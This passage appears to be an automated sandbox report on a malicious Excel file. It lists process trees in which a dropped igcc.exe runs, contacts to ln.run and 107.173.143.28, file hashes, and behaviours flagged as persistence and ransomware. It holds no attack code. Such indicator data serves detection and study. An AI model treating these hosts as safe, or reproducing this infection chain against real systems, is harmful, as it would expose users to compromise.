PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\85181e5805f7d9111755cb3afff215a156b86330bed4241c0383d7091e1dc8fc.xls

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Users\Admin\AppData\Roaming\igcc.exe

"C:\Users\Admin\AppData\Roaming\igcc.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Users\Admin\AppData\Roaming\igcc.exe

"C:\Users\Admin\AppData\Roaming\igcc.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ln.run udp
US 104.21.90.204:80 ln.run tcp
US 104.21.90.204:443 ln.run tcp
US 107.173.143.28:80 107.173.143.28 tcp
US 104.21.90.204:80 ln.run tcp
US 104.21.90.204:80 ln.run tcp
US 104.21.90.204:80 ln.run tcp
US 104.21.90.204:80 ln.run tcp
US 104.21.90.204:443 ln.run tcp
US 104.21.90.204:80 ln.run tcp
US 104.21.90.204:443 ln.run tcp
US 107.173.143.28:80 107.173.143.28 tcp
US 107.173.143.28:80 107.173.143.28 tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp

Files

memory/2012-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2012-1-0x0000000072CCD000-0x0000000072CD8000-memory.dmp

memory/2792-19-0x000000002FBA1000-0x000000002FBA2000-memory.dmp

memory/2792-21-0x0000000072CCD000-0x0000000072CD8000-memory.dmp

memory/2792-23-0x0000000002D90000-0x0000000002D92000-memory.dmp

memory/2012-24-0x0000000002290000-0x0000000002292000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{495D51C0-3F24-497D-B478-A8EB5C578F7F}

MD5 2b567edce929eab26e72baf169cd50dc
SHA1 1a61c00bf52f2a93c684bb8207d9ca0e7a8d5639
SHA256 9ba896b7dc782de69a1b21271fb14d1b01e01fce486824d040070d6d72246094
SHA512 00a9ccfafaae8bce535df3f4b040a112d9be73d1bb666b8136b72055efb9746416563a9d3ee885466684a14a8e0b193af0486534d96b6e81003811ef3d7701ee

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{BD246926-FDD0-458A-885F-D6D2627DE1BD}.FSD

MD5 d04125be403fa2206e14c56cef568daf
SHA1 5dcbe83d52c716fb87798525090d5253d1b89f05
SHA256 8e7dd6e43648307c0f9a09b093af9b3c944aff444b4aed05895909bb1987396a
SHA512 68fc859914d77f7071a23f386ac2a14a161e5a6288e73830f65411ffc33d61c64c6b441fd8523f0b3caf65e8d905af40c20072c2f1f9be5ee5f03c327746dbe9

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

MD5 1722dd4102de94974d390429eb694d5b
SHA1 06babb67464c50f978364258744090b6f2962f3b
SHA256 39c4fdce5202d87d6068234fda1c9d32a7aabb7abc2ef4f89ccc66f5300d2df3
SHA512 f5e7b356f112adc2a882d513984c3d30720c0518bdf1d006adcfcb3cc664a65d79b977fbda19e7e88ab1714b82db49cd5e8b38dc39deeb731a95d1f616475c0d

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

MD5 b0ff5893e6983d0d9c3549bf4ff1d079
SHA1 c89dda6d12c5d8f05be16dcf53a320be5ecca9ac
SHA256 52a3a04f243b4326e99d3755fc933043715126794927deb0282a9e5302c32913
SHA512 0715faddeb7ad063ef87fbe2095de290b5a795655f04bc9d107c96198210aaa5d185af7286072eccb4b13477896f79e23d834eb831cb3255b88af122586718de

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{1545546F-B18C-448D-ACBC-6FC221455F6F}.FSD

MD5 03a9a2efa5b5ce8171463f03c6ebaafc
SHA1 540fc6cb19037ec8592197c16c51a4312ba69c6f
SHA256 8f13267063fa292ca827fecf49b74998093179fdd4b149b98ec58a6b257d32a3
SHA512 3bcfecb9638c37cb211da16298c3579e3fe7ab5dc823bd52e73e7e59217d479a27e7c506d75205d12454d63a901bfcddde2dca8a1775533f66cc29483179bb6d

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\lionsarekingofjunglewhounderstandhowfastweareworkingonthejungleasakinglionsalwaysdoingattitudetounderstandheistheonlykinghave__entireworldkingsofjungle[1].doc

MD5 b11deda09cc2742d551b0d5dcd354ca0
SHA1 cce43ffeca6770177d14c42d06a820d089da4435
SHA256 df8f8da8b2d5f2bb64c4357fa298f64cd6522896dee8d10cd91616e4aad38cb9
SHA512 2e8ad1081fafdbf33733a14e8bb61e2f0960eee7dae2f0c562b817f2f86e33aa351c73ec6b2c700556b1f33fc4c0f08cd22c259e68a8bf645fa8d758e5485e17

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 33808b23864195394913039831030a10
SHA1 c8e44ead746918ae39d794ce1c643cb7eb1e0276
SHA256 784b66346117dc67b2c5da7657f0db63f00e723ac652bd93ac575cb1110a51d7
SHA512 dcf2f0f7305674719606cfa3f17ec31f62ed753d06e99a8add11fb6be98f5bbb6c892c0a82f1860e1db81fdfd733421b12999c2a1841103779d81f90ff9659af

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 aa08ec878b05196c518d4db7d55e371b
SHA1 349148372278a8cb178f3ecd9fc827797db9ed91
SHA256 7a1ba6bbe0ce1e04178103a593cf3dfd6db1c1acbac1e028544c0848c030df22
SHA512 c2ec69ee95370317b02a79758a80f43c59d896efd3f432916b3d6c9a2af39d528347dd9358950a8100115a3967a8a0d2bdd0c14e121b63798618b8dc5103b201

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 4daa0d525e94a9a50a19601543d904ed
SHA1 bea0e3e7eb78b0f3e2438c2e2652874ddffc417e
SHA256 34daedbb242afe08800f3a239a1ac3ac6551257aa85f38c197e71d640c538ff5
SHA512 89bca009470f998abbcdd43897fb6ceed4b26b458a35be5ee7284437b9453a9b79f371638bc652006a168f87ff3ecd95b11a0b5f62d7f311f1be41243b30754d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f6e37e1973964bfc98b893431ea0a7f4
SHA1 39940d986c5088751465972f8b9510cd9d30e38d
SHA256 cc945ac9f269aa3c46686fc0cd36c0d1608b32da0ff666bb70000f6c8110dd64
SHA512 b795652f7fe3fb3a3b24e43296fa9171ca1839fc73e094445aa72901c8b537c2e052a17955e2906dcf54c57e0e73bf84a893763a2a63026d30c7f41a087db1e1

C:\Users\Admin\AppData\Local\Temp\Cab4BEF.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Roaming\igcc.exe

MD5 968cf2f6dd1e574fbd7a60cb2fd057f5
SHA1 4e6cfcb4e13006a40eabf999d528fbbc3c5b4c82
SHA256 ada7a8238c9d285a764c29de13e82cad1a18ce50a5da9a60742b3bc0d0102d9d
SHA512 dfd77ec6fa6d11c34ec44d39e05f31f54e853bec6839567b7ec5712d6c645a371b94cbd35e0f92c770af504700a0a7677075b5294d75db938ed44d87c32ca49a

memory/1616-124-0x0000000001160000-0x0000000001216000-memory.dmp

memory/1616-126-0x0000000000710000-0x0000000000726000-memory.dmp

memory/2012-127-0x0000000072CCD000-0x0000000072CD8000-memory.dmp

memory/1616-128-0x0000000000770000-0x000000000077E000-memory.dmp

memory/1616-129-0x0000000000780000-0x0000000000790000-memory.dmp

memory/1616-130-0x0000000004BD0000-0x0000000004C52000-memory.dmp

memory/800-131-0x0000000000400000-0x0000000000442000-memory.dmp

memory/800-133-0x0000000000400000-0x0000000000442000-memory.dmp

memory/800-144-0x0000000000400000-0x0000000000442000-memory.dmp

memory/800-142-0x0000000000400000-0x0000000000442000-memory.dmp

memory/800-140-0x0000000000400000-0x0000000000442000-memory.dmp

memory/800-139-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/800-137-0x0000000000400000-0x0000000000442000-memory.dmp

memory/800-135-0x0000000000400000-0x0000000000442000-memory.dmp

memory/2792-146-0x0000000072CCD000-0x0000000072CD8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 a41cef8d6f4185e6c94550024d6fdc59
SHA1 9d941a2df12e581f1b07b4a8711164c1b2746458
SHA256 770521e0c997988a77f830082e0bd87fabeebfda26b82575e3c305747b19827b
SHA512 26874a0b009f562dc67f4b170526207078c24b553f13942c7d997b2179579cfdd022d10cd30ee3a3f95bc98e6f129b04cc75682dcf4f43ad1cdc35c15380af78

memory/2792-168-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2792-169-0x0000000072CCD000-0x0000000072CD8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-04 01:36

Reported

2024-06-04 01:38

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\85181e5805f7d9111755cb3afff215a156b86330bed4241c0383d7091e1dc8fc.xls"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeAuditPrivilege N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3020 wrote to memory of 4676 N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE C:\Windows\splwow64.exe
PID 3020 wrote to memory of 4676 N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE C:\Windows\splwow64.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\85181e5805f7d9111755cb3afff215a156b86330bed4241c0383d7091e1dc8fc.xls"

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" -Embedding

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.32.7:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 7.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 ln.run udp
US 172.67.161.41:80 ln.run tcp
US 172.67.161.41:443 ln.run tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 41.161.67.172.in-addr.arpa udp
US 107.173.143.28:80 107.173.143.28 tcp
US 8.8.8.8:53 35.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 28.143.173.107.in-addr.arpa udp
US 172.67.161.41:80 ln.run tcp
US 172.67.161.41:80 ln.run tcp
NL 23.62.61.129:443 www.bing.com tcp
US 172.67.161.41:80 ln.run tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 172.67.161.41:80 ln.run tcp
US 172.67.161.41:80 ln.run tcp
US 172.67.161.41:80 ln.run tcp
US 172.67.161.41:443 ln.run tcp
US 107.173.143.28:80 107.173.143.28 tcp
US 172.67.161.41:80 ln.run tcp
US 172.67.161.41:443 ln.run tcp
US 8.8.8.8:53 224.162.46.104.in-addr.arpa udp
US 107.173.143.28:80 107.173.143.28 tcp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
NL 23.62.61.162:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 162.61.62.23.in-addr.arpa udp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 23.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

memory/4868-0-0x00007FFF98550000-0x00007FFF98560000-memory.dmp

memory/4868-4-0x00007FFFD856D000-0x00007FFFD856E000-memory.dmp

memory/4868-3-0x00007FFF98550000-0x00007FFF98560000-memory.dmp

memory/4868-2-0x00007FFF98550000-0x00007FFF98560000-memory.dmp

memory/4868-6-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-5-0x00007FFF98550000-0x00007FFF98560000-memory.dmp

memory/4868-1-0x00007FFF98550000-0x00007FFF98560000-memory.dmp

memory/4868-9-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-11-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-10-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-12-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-13-0x00007FFF96100000-0x00007FFF96110000-memory.dmp

memory/4868-8-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-7-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-14-0x00007FFF96100000-0x00007FFF96110000-memory.dmp

memory/4868-15-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-16-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-19-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-18-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-17-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/3020-40-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/3020-43-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7D5E7D2A-3B53-408B-B26D-98CEB025ABC1

MD5 6798e532bab05cca79e0fd03ab31fd4c
SHA1 5ce3208dfdffc43a8e8318829f61f7164ec8aaae
SHA256 c26198179bb8303c7374589ac5169bd4d6de1b92534c66c03759e5b260d99ba0
SHA512 2513d6bd8f05de0351f7a2c813023b17fb50df103cb6c7981bbd9e9fd202b7557c888b6b471db3a0e67879635a19b7bfc432778a9247d7f3e85fa801a46db7e1

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

MD5 4517ceaa188ee6541e0a53852a73611f
SHA1 02498c46cae0e62fe55ee0f2faac4f6493a13188
SHA256 98919f294d88ecdb8260caf01d9b671c97c1f361baa8d1de3ae3746f9bdebee1
SHA512 95f7f804a0c5a4e7a4ab1fe9019d601c1533a6531c022f1252f297aa899941bf925228a95e0ef5d168ac3a89f7fc7132fd9422a6b499b421061a7c32d82617ba

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

MD5 c578257aae50356a738800958da9eb6e
SHA1 e4c15fb5c2bef0145f5ee7d75f3d47773718bb5f
SHA256 81a6fc47aa0603a5d977faf61c270e1c96a18444163788cae9b3db48c2b7695d
SHA512 395ea9bc108ca59e02f6076cba9d3d4322b03493f2a8cb1eec2776bcb30e3fc44a50bd268cdefca0d9987db8740a31ec0310b2c945a883ceec07235aa2a2dcca

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VLW1SL5J\lionsarekingofjunglewhounderstandhowfastweareworkingonthejungleasakinglionsalwaysdoingattitudetounderstandheistheonlykinghave__entireworldkingsofjungle[1].doc

MD5 b11deda09cc2742d551b0d5dcd354ca0
SHA1 cce43ffeca6770177d14c42d06a820d089da4435
SHA256 df8f8da8b2d5f2bb64c4357fa298f64cd6522896dee8d10cd91616e4aad38cb9
SHA512 2e8ad1081fafdbf33733a14e8bb61e2f0960eee7dae2f0c562b817f2f86e33aa351c73ec6b2c700556b1f33fc4c0f08cd22c259e68a8bf645fa8d758e5485e17

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 8c40e987f3f489c73d66820d4000c0c3
SHA1 f4ddb46eb5a9bdb83399ae5bad5df456e055f9eb
SHA256 88953c52610276adf734074a98bd180fe924e9728fc7ebeac212208d83c0a4f1
SHA512 36750520b0cec5aa6f2519bb44b193e96d2e476a1b09bc8fdf82b444c150a788997e0f18538190ca1d6577cdab03369e5daec058b805c284b39ab9eec760bbc2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 c94762945b769b0a0b6b9d16a96bc9c2
SHA1 048a02cadbb7d171bd316eb0e675bbe683d9d09a
SHA256 10f125e5e6cccc7b50cd65c17352ee628bd91eb949631298d1b52d00cd1e7497
SHA512 b483c3d61d1e6fe0bcc1bc2182ec2913d5b05428d3939e2e9cc237f11483f9dec8165a678c3aeb5f61f8529bde6675835dfc5f8877ecbc7ad81626cdc16fc42c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 aa08ec878b05196c518d4db7d55e371b
SHA1 349148372278a8cb178f3ecd9fc827797db9ed91
SHA256 7a1ba6bbe0ce1e04178103a593cf3dfd6db1c1acbac1e028544c0848c030df22
SHA512 c2ec69ee95370317b02a79758a80f43c59d896efd3f432916b3d6c9a2af39d528347dd9358950a8100115a3967a8a0d2bdd0c14e121b63798618b8dc5103b201

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 159bd104d892e7906616083decdffd11
SHA1 d3c5bba03b676fbe1324695394a9884688a069ed
SHA256 24fe97cb2771af57c191a7d8ad8c0f33877c9c9ea3a0a9ea055ae0b5e3781a17
SHA512 055b5c697640640f0771ab737877e7779ea6e89d7564bd8ebbd95eaad4b187e095cc713b04e1af658e698665aab59b2cc4227cc59d86d2905e170ebb3f1a0c29

C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\logs\mip_sdk.miplog

MD5 0d91c00130074f9a2668e85a3d9cf780
SHA1 1268c4cb5ecabb8699163bba6c9418a89f4b4ca0
SHA256 c2c1964a535066c396094764a558a6b087b0c17cdd8b662cd3f144eb283f4c95
SHA512 83c71c4cb3ea78f5e4c232bca63b8368c67c68864c3965b51ff2c1fcb0538f1b5c85c17a2db048d58f89dbf6c761f4eda6c7a352ff2bea531906e404647bbd58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

MD5 a67829b3f9cd840d7d4828ccc4e4ab5b
SHA1 14fba66b7a715326401e0b36f464e713f1885ff3
SHA256 c0199a176d0c1c7a5b6a5bf4cffdf6ce0e81d6a89b2b5194233a567b03955c1f
SHA512 59237d08d45effe25ff0f13ea1edce03f2821891ead67216153ac843eccc2fbae82c210b0993dff9addf36d668b3cf62b2eadfb7917aa886a14baed1c863a94b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

MD5 23fe130785de42f0ca6f030ec6aefa17
SHA1 2d1224a3844fdd21d3973ad343e3173348e8692f
SHA256 cd08570440bd2d949130d1effa6bb8e35ea8a14cf44f6db0dba4245380a840fd
SHA512 4d2f9141c672acac9e8244b87aa1ce6363a3be02d9f672308276d010b319ad4242cbbfeb2da1f6992424305f43db59ae8125312fd91e8327552a560b9d5e057c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 a95b7c349f9fa30b722212ab8671eb06
SHA1 49c6289fb8c0fc8a2dfdfdd70a40a4d1b614577a
SHA256 a80933ba09720bba39d196579fe764aedab900eb1e4a9dca783101d9ad6b4d4f
SHA512 4f971ae29f904be8fdf48ad6cd640034ab978b69c794d62f289495494cade5c0bb02365c44e560f6215a76a4222e8534f257c17250ae5fd870ec99448c1813fd

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 1bd54f91cfabfe3c96811aa4f4b99357
SHA1 05a0fa847023a2836dd32c9a98d3be03339947fa
SHA256 27bba482190f6d1faa770d3129666a956ff6eab469e115ad195baf95c926b70a
SHA512 570407e842d2c78d95e74c6a6b9eb9f557974cefa7d078b0b30a4967ce64997d09175bec46e39e380928dbcc2ad7bef14f3518e468366f14f4033cea1f20deef

C:\Users\Admin\AppData\Local\Temp\TCDAC43.tmp\iso690.xsl

MD5 ff0e07eff1333cdf9fc2523d323dd654
SHA1 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA256 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512 b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

memory/4868-518-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/3020-573-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp